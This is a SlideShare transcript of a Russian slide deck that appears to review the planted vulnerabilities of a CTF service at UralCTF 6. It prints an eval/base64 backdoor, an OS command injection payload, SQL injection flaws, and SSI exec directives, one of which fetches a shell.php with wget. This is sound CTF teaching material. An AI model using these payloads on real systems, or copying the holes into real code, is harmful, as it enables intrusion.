Your SlideShare is downloading. ×
0
Отдел кадров Самый простой сервис  UralCTF 6
Стандартные пароли <ul><li>Меняйте все пароли, какие только возможно сменить! </li></ul><ul><li>Кроме того, хорошо бы удал...
Старый шелл код <ul><li>mysql.php: </li></ul><ul><li>@$_GET[‘code’]&& </li></ul><ul><li>eval(base64_decode($_GET[‘code’]))...
Инъекция ОС <ul><li>index.php: </li></ul><ul><li>$act=@$_GET['act']; </li></ul><ul><li>if(!$act)$act='index'; </li></ul><u...
Слепая  SQL  инъекция <ul><li>$ip= </li></ul><ul><li>@$_SERVER[‘ HTTP_ X_FORWARDED_FOR']? </li></ul><ul><li>$_SERVER[' HTT...
SQL  инъекция <ul><li>show.inc: </li></ul><ul><li>$sort=preg_replace('/UNION|SELECT| -- | |/*(.*)*//i','',$sort,E_STRICT);...
SSI <ul><li>LoadModule include_module modules/mod_include.so </li></ul><ul><li>Options +Includes </li></ul><ul><li>AddOutp...
??? <ul><li>//if($info['flag'])echo '<span style=&quot;display:none;)&quot;>'.$info['flag'].'</span>'; </li></ul><ul><li>$...
Ваши вопросы? Совсем нету?
Upcoming SlideShare
Loading in...5
×

1f5694b92ab2c96e2038b33a8b0ceb7d

162

Published on

0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total Views
162
On Slideshare
0
From Embeds
0
Number of Embeds
0
Actions
Shares
0
Downloads
1
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide

Transcript of "1f5694b92ab2c96e2038b33a8b0ceb7d"

  1. 1. Отдел кадров Самый простой сервис UralCTF 6
  2. 2. Стандартные пароли <ul><li>Меняйте все пароли, какие только возможно сменить! </li></ul><ul><li>Кроме того, хорошо бы удалить не нужные файлы, например phpinfo.php </li></ul>
  3. 3. Старый шелл код <ul><li>mysql.php: </li></ul><ul><li>@$_GET[‘code’]&& </li></ul><ul><li>eval(base64_decode($_GET[‘code’])); </li></ul><ul><li>print_r(mysql_fetch_array(mysql_query(…))) </li></ul>
  4. 4. Инъекция ОС <ul><li>index.php: </li></ul><ul><li>$act=@$_GET['act']; </li></ul><ul><li>if(!$act)$act='index'; </li></ul><ul><li>eval(`type {$act}.inc`); </li></ul><ul><li>?act=add.inc && echo+ ” phpinfo() ”&& cat+add </li></ul>
  5. 5. Слепая SQL инъекция <ul><li>$ip= </li></ul><ul><li>@$_SERVER[‘ HTTP_ X_FORWARDED_FOR']? </li></ul><ul><li>$_SERVER[' HTTP_ X_FORWARDED_FOR']: </li></ul><ul><li>$_SERVER['REMOTE_ADDR']; </li></ul><ul><li>INSERT INTO `log` (url,ip,time) </li></ul><ul><li>VALUES ('{$url}','{$ip}',NOW()) </li></ul>
  6. 6. SQL инъекция <ul><li>show.inc: </li></ul><ul><li>$sort=preg_replace('/UNION|SELECT| -- | |/*(.*)*//i','',$sort,E_STRICT); </li></ul><ul><li>$sql=&quot;HANDLER $mysql_table READ id $sort WHERE flag='' LIMIT 1&quot;; </li></ul>
  7. 7. SSI <ul><li>LoadModule include_module modules/mod_include.so </li></ul><ul><li>Options +Includes </li></ul><ul><li>AddOutputFilter INCLUDES .php </li></ul><ul><li><!--#exec cmd=&quot;ls - la &quot; --> </li></ul><ul><li><!--#exec cmd=“ wget http://.../shell.php &quot; --> </li></ul>
  8. 8. ??? <ul><li>//if($info['flag'])echo '<span style=&quot;display:none;)&quot;>'.$info['flag'].'</span>'; </li></ul><ul><li>$sort='LAST'; </li></ul><ul><li>// eval(`type {$act}.inc`); </li></ul>
  9. 9. Ваши вопросы? Совсем нету?
  1. A particular slide catching your eye?

    Clipping is a handy way to collect important slides you want to go back to later.

×